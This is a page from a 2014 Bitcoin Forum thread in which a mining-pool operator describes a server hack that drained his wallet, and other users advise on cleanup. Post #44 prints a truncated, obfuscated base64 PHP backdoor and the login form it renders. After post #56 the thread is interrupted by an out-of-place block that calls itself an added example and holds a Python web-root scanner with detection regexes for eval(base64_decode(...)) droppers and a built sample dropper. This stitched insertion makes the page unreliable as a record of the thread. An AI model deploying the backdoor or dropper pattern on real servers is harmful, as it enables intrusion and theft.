Bitcoin Forum
Topic: Looks like my BTC wallet was hacked (Read 7166 times), page 3 of 4
suprastan (Newbie, Activity: 27, Merit: 0)
February 18, 2014, 03:43:17 PM, post #41

Mod_Security would most likely have prevented files from being uploaded and executed, which it sounds like happened here.

Sad
Goldshredder (Full Member, Activity: 249, Merit: 100)
February 18, 2014, 05:45:36 PM, post #42

Perhaps you could reach an arrangement with somebody like fcmatt, to do some private security consulting for you.  At the very least it would be a second layer, a second set of experienced eyes keeping watch on that side of your site.  I always feared right from the start the possibility of thieves coming against you as you became higher profile.
El_Nickio (Member, Activity: 95, Merit: 10)
February 18, 2014, 06:05:44 PM, post #43

Sorry for your troubles Tommo - I'd be happy for a zeroed account and a fresh start!
dddbtc (Sr. Member, Activity: 490, Merit: 250)
February 18, 2014, 06:14:54 PM, post #44

Interesting, I've also found a call to the file tompoolforum/library/lib.php, but I don't see this file in the vanilla forums project git. Viewing the file it looks like this:

<?php
$o="QAEAOzh3b3cKDQAjYnV1aHVYdWIAAHdodXNuaWAvMC48Cg1HdGIAAHNYamZgbmRYdnJoc2J0WHUAgHJ pc25qYi83AfFoZVh0c2Z1JABzLwDRI2oBkSc6J2J/d2toY2IAEy8gJ ... (about 40 thousand characters more) ... RsbGxsbGxsbGwpOw=="));return;?>

If I load the page the source looks like this:

<style type="text/css">
   input {font:11px Verdana;BACKGROUND: #FFFFFF;height: 18px;border: 1px solid #666666;}
</style>
<form method="POST" action="">
   <span style="font:11px Verdana;">Password: </span><input name="password" type="password" size="20">
   <input type="hidden" name="doing" value="login">
   <input type="submit" value="Login">
</form>

It renders as a password input field with a Login button.

I am a user of your pool. This is very unfortunate.  I have also been following the hack of the TomCoin portion for the past few days.  Please copy all of suspicious PHP source and make a pastebin.  I should be able to decrypt it and give you more information regarding the attack on your pool.

Thanks and Best of Luck!
Tommo_Aus (OP) (Sr. Member, Activity: 420, Merit: 250)
February 18, 2014, 11:08:44 PM, post #45

> I am a user of your pool. This is very unfortunate.  I have also been following the hack of the TomCoin portion for the past few days.  Please copy all of suspicious PHP source and make a pastebin.  I should be able to decrypt it and give you more information regarding the attack on your pool.
>
> Thanks and Best of Luck!

What would be a good place to upload it? I could put it in a zip file.

Tompool - http://tompool.org - a 2% fee SHA256/Scrypt/BURST/Groestl multipool supporting ANC, ASC, DGC, EZC, FLO, GLD, GME, MNC, RYC, TGC, TRC, XNC, ZET & more
Hushpupy (Newbie, Activity: 8, Merit: 0)
February 19, 2014, 05:11:00 AM, post #46

> Sorry for your troubles Tommo - I'd be happy for a zeroed account and a fresh start!

I will be happy to donate my miners on your pool for a day to help you build up your pool again. 38gh for a day. Let's start a donation to Tom pool! Anyone else would like to make a miner donation to Tom pool?
Tommo_Aus (OP) (Sr. Member, Activity: 420, Merit: 250)
February 19, 2014, 05:22:51 AM, post #47

Heh many thanks but no need, I'll just get things back up and more secure then hope some miners return Smiley

I've removed the forum software, changed passwords, reviewed files in the web directories and blocked a heap of ports (about the only ones open now are for the web server, mining (stratum) and SSH access).

TomCoin is now up, should have the other pools and multipools up soon. I'm just taking this as an opportunity to load balance between the servers as running so many wallets on my server with lower disk I/O is hurting its performance.

Tompool - http://tompool.org - a 2% fee SHA256/Scrypt/BURST/Groestl multipool supporting ANC, ASC, DGC, EZC, FLO, GLD, GME, MNC, RYC, TGC, TRC, XNC, ZET & more
fcmatt (Legendary, Activity: 2072, Merit: 1001)
February 19, 2014, 05:24:27 AM, post #48

> Heh many thanks but no need, I'll just get things back up and more secure then hope some miners return Smiley
>
> I've removed the forum software, changed passwords, reviewed files in the web directories and blocked a heap of ports (about the only ones open now are for the web server, mining (stratum) and SSH access).
>
> TomCoin is now up, should have the other pools and multipools up soon. I'm just taking this as an opportunity to load balance between the servers as running so many wallets on my server with lower disk I/O is hurting its performance.

Tommo, I am glad to see you up and running again.

Perhaps I can message you in the future if I have any curious questions about your experiences running a multicoin pool?
tertius993 (Hero Member, Activity: 1029, Merit: 712)
February 19, 2014, 07:14:55 AM, post #49

Good news.  My miner switched back automatically when the pool came back online.
Tommo_Aus (OP) (Sr. Member, Activity: 420, Merit: 250)
February 19, 2014, 01:13:57 PM, post #50

Thanks guys, I've just brought the individual pools and multipools back online, hopefully some smooth sailing from here!

Don't hesitate to contact me fcmatt, thanks for all your help identifying the point of entry you were spot on, I'd be glad to return the favour Smiley

Tompool - http://tompool.org - a 2% fee SHA256/Scrypt/BURST/Groestl multipool supporting ANC, ASC, DGC, EZC, FLO, GLD, GME, MNC, RYC, TGC, TRC, XNC, ZET & more
dddbtc (Sr. Member, Activity: 490, Merit: 250)
February 19, 2014, 02:08:45 PM, post #51

> > I am a user of your pool. This is very unfortunate.  I have also been following the hack of the TomCoin portion for the past few days.  Please copy all of suspicious PHP source and make a pastebin.  I should be able to decrypt it and give you more information regarding the attack on your pool.
> >
> > Thanks and Best of Luck!
>
> What would be a good place to upload it? I could put it in a zip file.

http://www.zippyshare.com/ would work nicely. They don't have any ads or compulsory registration.
creepywheepy (Member, Activity: 87, Merit: 10)
February 19, 2014, 04:05:13 PM, post #52

Sorry to hear that. I wonder cause hacking is really a big problem - what is the best way to protect from hacks?

Donations - d5737925-d46d-47ec-9941-94a12a68861b
Hushpupy (Newbie, Activity: 8, Merit: 0)
February 19, 2014, 04:16:54 PM, post #53

Tom Pool is up and running again!!!!!
dddbtc (Sr. Member, Activity: 490, Merit: 250)
February 19, 2014, 04:19:56 PM, post #54

> Tom Pool is up and running again!!!!

Have happily kept 30GH/s on tompool the entire time. Thankfully I am auto-withdrawing altcoins to cryptsy and not utilizing TomCoin.  Really glad to see the project wasn't closed due to the hack.
Tommo_Aus (OP) (Sr. Member, Activity: 420, Merit: 250)
February 21, 2014, 01:06:56 AM, post #55

I've uploaded the lib.php file to here:

http://www8.zippyshare.com/v/82893458/file.html

I'd greatly appreciate if someone could take a look at it just to make sure there isn't anything else I should worry about.

Checked my BTC wallet today and found another transaction, luckily it wasn't significant as everything else had been emptied out earlier... little shit ('scuse my French) going back for more. I did a file contents search and found another instance of it in my web dir under a different name. I'd moved all of the other wallets to another server earlier on so access was only available to the one wallet. I've since deleted this last instance of the craplication.

Tompool - http://tompool.org - a 2% fee SHA256/Scrypt/BURST/Groestl multipool supporting ANC, ASC, DGC, EZC, FLO, GLD, GME, MNC, RYC, TGC, TRC, XNC, ZET & more
fcmatt (Legendary, Activity: 2072, Merit: 1001)
February 21, 2014, 01:15:17 AM, post #56

> I've uploaded the lib.php file to here:
>
> http://www8.zippyshare.com/v/82893458/file.html
>
> I'd greatly appreciate if someone could take a look at it just to make sure there isn't anything else I should worry about.
>
> Checked my BTC wallet today and found another transaction, luckily it wasn't significant as everything else had been emptied out earlier... little shit ('scuse my French) going back for more. I did a file contents search and found another instance of it in my web dir under a different name. I'd moved all of the other wallets to another server earlier on so access was only available to the one wallet. I've since deleted this last instance of the craplication.

You really need to remove everything from www dir and put back only what you know. Or list all files looking for newer dates, file creation times, files created by www instead of root or your normal user you edit files with, etc. They tend to leave multiples of these backdoors for this exact reason.  I failed to mention this to you but I did say start www from scratch or review every file.
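The triage fcmatt describes (newer mtimes, files owned by the web server user, content search for the dropper pattern dddbtc posted in #44: a one-line PHP file carrying one huge base64 literal) as an added example, not code from this thread or from Tompool. It assumes a POSIX host; the decode-then-execute regex and the constructed sample tree are assumptions, not the real lib.php.

```python
import os
import re
import tempfile
import time
from pathlib import Path

# Heuristics modelled on the dropper quoted in this thread: a one-line <?php file whose
# body is one huge base64 literal. The decode-then-execute regex is a general assumption
# about such droppers, not something the truncated sample on the page shows.
LONG_B64 = re.compile(r'["\'][A-Za-z0-9+/]{200,}={0,2}["\']')
DECODE_EXEC = re.compile(r'\b(eval|assert|create_function)\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(')

def scan_file(path: Path, baseline: float, owner_uid=None) -> list:
    """Reasons a file deserves a look (empty list = nothing flagged)."""
    reasons, st = [], path.stat()
    if st.st_mtime > baseline:                      # newer than the last known-good deploy
        reasons.append("modified-after-baseline")
    if owner_uid is not None and st.st_uid != owner_uid:
        reasons.append("unexpected-owner")          # e.g. written by the web server user
    if path.suffix.lower() in {".php", ".phtml", ".inc"}:
        text = path.read_text(errors="replace")
        if LONG_B64.search(text):
            reasons.append("long-base64-literal")
        if DECODE_EXEC.search(text):
            reasons.append("decode-then-exec")
    return reasons

def triage_webroot(root, baseline: float, owner_uid=None) -> dict:
    """Walk a web root; map relative path -> reasons for every flagged file."""
    root, found = Path(root), {}
    for p in root.rglob("*"):
        if p.is_file():
            reasons = scan_file(p, baseline, owner_uid)
            if reasons:
                found[str(p.relative_to(root))] = reasons
    return found

def build_sample_webroot():
    """Constructed sample tree: a clean file older than the baseline and a renamed dropper."""
    root = Path(tempfile.mkdtemp())
    (root / "library").mkdir()
    clean = root / "index.php"
    clean.write_text("<?php echo 'hello'; ?>\n")
    os.utime(clean, (time.time() - 30 * 86400,) * 2)   # pretend it shipped a month ago
    baseline = time.time() - 7 * 86400                  # last known-good deploy, a week ago
    blob = "QAEAOzh3b3cKDQAjYnV1aHVYdWIAAHdo" * 40      # constructed filler, not the real payload
    (root / "library" / "cache.php").write_text(
        '<?php $o="' + blob + '";eval(base64_decode($o));return;?>')
    return root, baseline
```

Pass the uid of the account you deploy with as `owner_uid` to also catch files the web server user wrote; on a real host run it against the web root with the mtime of the last clean deploy as the baseline.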
Tommo_Aus (OP) (Sr. Member, Activity: 420, Merit: 250)
February 21, 2014, 02:19:11 AM, post #57

> You really need to remove everything from www dir and put back only what you know. Or list all files looking for newer dates, file creation times, files created by www instead of root or your normal user you edit files with, etc. They tend to leave multiples of these backdoors for this exact reason.  I failed to mention this to you but I did say start www from scratch or review every file.

Yeah I checked through the files and creation dates, somehow I missed this one.

Tompool - http://tompool.org - a 2% fee SHA256/Scrypt/BURST/Groestl multipool supporting ANC, ASC, DGC, EZC, FLO, GLD, GME, MNC, RYC, TGC, TRC, XNC, ZET & more
pengoau (Full Member, Activity: 208, Merit: 100)
February 21, 2014, 10:45:31 AM, post #58

> > I am a user of your pool. This is very unfortunate.  I have also been following the hack of the TomCoin portion for the past few days.  Please copy all of suspicious PHP source and make a pastebin.  I should be able to decrypt it and give you more information regarding the attack on your pool.
> >
> > Thanks and Best of Luck!
>
> What would be a good place to upload it? I could put it in a zip file.

Even though I'm late...

A good file sharing site is:  mega.co.nz

Security suggestion: Implement 2 Factor Auth (now that the backdoor is known and gone) and mod_security to prevent hackers uploading files if they find a new backdoor.

Just my 2c worth...
Any money the hacker is watching this thread and found out about your pool from this forum.

Paranoid much? Smiley

Sucks to hear you got hacked tommo, good to hear you are persisting and this has been a worthwhile learning experience. At least only 10k or so of coins were stolen so there is no real need for clients to come after you. You don't need legal or financial problems to be added to your grief.

Tommo_Aus (OP) (Sr. Member, Activity: 420, Merit: 250)
July 14, 2014, 12:36:53 AM, post #59

Been a while since this happened but does this mean the coins are still sitting in the same address?

https://blockchain.info/address/1EEERRbx4v6TNxgHJNthgroKBQLhehgdRt

Really sucks seeing the coins there in limbo in someone else's account.

Tompool - http://tompool.org - a 2% fee SHA256/Scrypt/BURST/Groestl multipool supporting ANC, ASC, DGC, EZC, FLO, GLD, GME, MNC, RYC, TGC, TRC, XNC, ZET & more
AliceWonder (Full Member, Activity: 168, Merit: 100)
July 14, 2014, 08:54:40 PM, post #60

Looks that way to me.

QuarkCoin - what I believe bitcoin was intended to be. On reddit: http://www.reddit.com/r/QuarkCoin/